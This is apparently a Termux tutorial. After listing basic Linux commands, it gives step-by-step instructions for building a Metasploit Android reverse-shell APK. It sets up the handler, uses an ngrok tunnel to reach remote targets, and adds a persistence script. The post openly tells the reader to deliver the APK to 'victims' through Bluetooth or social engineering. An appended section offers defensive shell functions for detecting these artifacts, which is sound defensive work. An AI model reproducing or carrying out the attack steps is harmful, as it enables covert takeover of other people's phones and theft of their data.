Some basic termux commands:
1)ls --version : to see the version
2)ls -a : to see hidden files
3)apt install <pkg name> : to install packages
4)ls : to see the files and folders
5)cat <file.txt name> : to see the content of a file
6)nano : the text editor command
7)pwd : print working directory (shows the present working directory)
8)cd <dir name> : to change the directory
9)touch <file name> : to create a new file
10)mkdir <folder name> : to make a folder
11)cd .. : to come out of the directory
12)pkg list-all : list all packages
13)ctrl+x : to exit the file open in nano
14)mv -v <file/folder name> /sdcard/folder (where you want to move it) : to move a file or folder
15)rm <file name> : to remove a file
16)rm -rvf <folder name> : to remove a folder
17)cp <file name> <destination> : to copy a file
18)uname -m : to know the architecture of your device
19)uname -a : to see the kernel information of your device
20)ifconfig : a utility used on Linux machines to configure, assign, add, delete, control and query network interfaces.
21)curl ifconfig.me : to know you
22)ping : command used to check connectivity
23)chmod : used to change the access mode for user, group or others.
24)echo : to display a line of text.
25)chmod 777 : to give read, write and execute permission to user, group and others.
26)chmod +x * : to add execute permission to every file in the current directory
27)cal : to show the calendar
28)df : used to display filesystem information about total space and available space.
30)cat /proc/cpuinfo : shows full information about the CPU.
31)apt install git : to install git
32)wget : a Linux command-line utility that helps us download files from the web
"example":- wget URL(paste url here)
TO INSTALL METASPLOIT-FRAMEWORK IN TERMUX
->pkg install unstable-repo
->pkg install metasploit (it can take a few minutes and needs approx. 600 MB of space to install)
TO SEE THE MS FRAMEWORK
->ls
->cd --
->ls (if you see the file name <metasploit-framework> then you can use it)
WAY TO ACCESS MS-FRAMEWORK
->Type pwd, then you can see the home working directory like this: data/data/com.termux/files/home. Then you can simply copy from data to files and paste it as shown below
->cd data/data/com.termux/files/usr/opt + enter, then type
->ls here you can see the file name <metasploit-framework>
SOME COMMANDS IN MSF (metasploit framework)
To launch the metasploit framework, simply type: msfconsole
->help
->banner
->show exploits
->show payloads
->show auxiliary
->search android
NOTE:6500 ports in our system
METASPLOIT_OVER_THE_LAN (this attack works when the victim and the attacker are on the same network)
->to create payload type in termux screen : ./msfvenom -p android/meterpreter/reverse_tcp LHOST=(paste your ip address here) LPORT=<any four digit>e.g:- 8888 -o /sdcard/apkname.apk
after a few seconds the apk will be generated and saved in your sdcard (here sdcard means internal storage)
to check ip address type : ifconfig
NOTE-[Download mix file manager (copy this link <https://mixplorer.en.uptodown.com/android>, paste it in your browser and download it). After that go into mix file manager and sign and auto the apk,
and then send it to victims via bluetooth or social engineering]
->type : msfconsole
->use exploit/multi/handler
->set payload android/meterpreter/reverse_tcp
->set lhost <ip address via ifconfig>
->set lport <8888> (the port number should be the same)
->exploit
NOTE:[wait for the victim to install and open the apk]
->then type: help <it will show all commands and details on how to get some information about the victim>
PORT_FORWARDING_DEMONSTRATION_WITH_TURNED_ON_ALONG_WITH_HOTSPOT [It works when a victim is sitting in another country or state]
->download ngrok for linux from chrome browser then
->open termux and type:- cd /sdcard/download (where ngrok is downloaded and saved)
->mv ngrok * $HOME - to move ngrok to home
->type:- ls then cd then you see the zip file <ngrok-stable-linux-arm.zip>
->type :- unzip paste here <ngrok-stable-linux-arm.zip> then
->type :- ls to see that ngrok has turned green, which means ngrok is installed successfully.
->in this step copy your authentication token from the dashboard of the ngrok website where you downloaded ngrok.
->then paste this authentication token in termux and hit enter
->now your hotspot and data should be on while creating the payload.
->then open a new termux screen.
NOTE-FIRST YOU WILL HAVE TO START A SESSION BY TYPING :- ./ngrok tcp 8989<any four digit number>
->for generating payload type:- ./msfvenom -p android/meterpreter/reverse_tcp LHOST=<0 TO .io>from ngrok session LPORT=<it is also in ngrok session> -o /sdcard/filename.apk then hit enter
->eg:-./msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=1234 -o /sdcard/filename.apk
then open msfconsole and type the following commands
->use exploit/multi/handler
->set payload android/meterpreter/reverse_tcp
->set lhost (from ngrok session screen)
->set lport (the lport number here is the one used when the session was connected with ./ngrok tcp 9999 <- this port number)
PORT_FORWARDING_USING_WIFI
NOTE:- first remove ngrok if you have it; follow these steps to remove that file
->ls
->rm ngrok
->copy zip file (ngrok)
->rm -rf .zip
->ls to see whether the ngrok file was removed or not
Then you can start port forwarding:-
now type :- pkg upgrade && update
->pkg install wget unzip -y
->wget https://github.com/Linux-Droid/Ngrok/raw/master/Ngrok_linux_Droid.zip then hit enter
->ls to see whether Ngrok was downloaded or not
->unzip Ngrok.zip(paste here zip file)
->chmod +x Ngrok (to get full permission)
->to start session type :- ./ngrok http 9090<any four digit number>
->./ngrok tcp 8989 (optional, you can try this if the above failed)
->the rest of the procedure is the same as for generating the payload.
NOTE:- after the apk is generated, go to mix file manager, sign and auto the apk file, then send it to the victims
MAKING_OUR_PAYLOAD_PERSISTENT
->install nano : pkg install nano
->open nano by typing : nano in your termux.
->nano syslogs.sh
write a bash script:-
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity (after -n hit enter the procced)
sleep 5
then type :- cat syslogs.sh to see the bash script
then type :- ls
then copy syslogs.sh to the sdcard :- cp syslogs.sh /sdcard
now the whole process to generate the payload is the same.
after exploit
type : sysinfo in the meterpreter session, then access the victim's phone and upload the apk to his/her system
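
From the defender's side, the procedure above leaves three checkable artifacts: the default stager package `com.metasploit.stage`, DNS lookups for an ngrok TCP tunnel host such as `0.tcp.ngrok.io`, and a loop script that keeps re-launching an activity with `am start`. The shell functions below are an added example, not part of the original post; the function names, the DNS log layout and all sample data are assumptions constructed for illustration.

```shell
# Added example (not from the original post); every SAMPLE_* value is constructed.
SAMPLE_PACKAGES='package:com.android.chrome
package:com.metasploit.stage
package:org.mozilla.firefox'

# Assumed DNS log layout: time, "query", record type, queried name.
SAMPLE_DNS='10:01:02 query A play.googleapis.com
10:01:07 query A 0.tcp.ngrok.io
10:01:12 query A 0.tcp.ngrok.io
10:03:40 query A example.org'

# The loop lines as they appear in the post's syslogs.sh.
SAMPLE_SCRIPT='#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 5'

# Reads `pm list packages` output on stdin; prints the default stager package
# if it is installed. A repackaged APK will not match, so a miss is inconclusive.
find_stage_package() {
    sed -n 's/^package:\(com\.metasploit\.stage\)$/\1/p'
}

# Reads DNS log lines (last field = queried name); prints "count name" for
# every ngrok TCP tunnel endpoint that was looked up.
find_tunnel_lookups() {
    awk '$NF ~ /\.tcp\.ngrok\.io$/ { n[$NF]++ }
         END { for (h in n) print n[h], h }' | sort -rn
}

# Reads a shell script on stdin; exits 0 when it contains an endless loop
# that keeps re-launching an activity with `am start -n <component>`.
is_relaunch_loop() {
    awk '/while[ \t]+(true|:)/ { loop = 1 }
         loop && /am[ \t]+start/ && /-n[ \t]+[A-Za-z0-9_.]+\// { hit = 1 }
         END { exit hit ? 0 : 1 }'
}

# Prints one finding per line for the three constructed samples.
triage_samples() {
    pkg=$(printf '%s\n' "$SAMPLE_PACKAGES" | find_stage_package)
    [ -n "$pkg" ] && echo "package: $pkg"
    printf '%s\n' "$SAMPLE_DNS" | find_tunnel_lookups | sed 's/^/dns: /'
    printf '%s\n' "$SAMPLE_SCRIPT" | is_relaunch_loop && echo "script: relaunch loop"
    return 0
}

triage_samples
```

On a real device the same functions take live input, for example `pm list packages | find_stage_package`, or `adb shell pm list packages | find_stage_package` from a workstation.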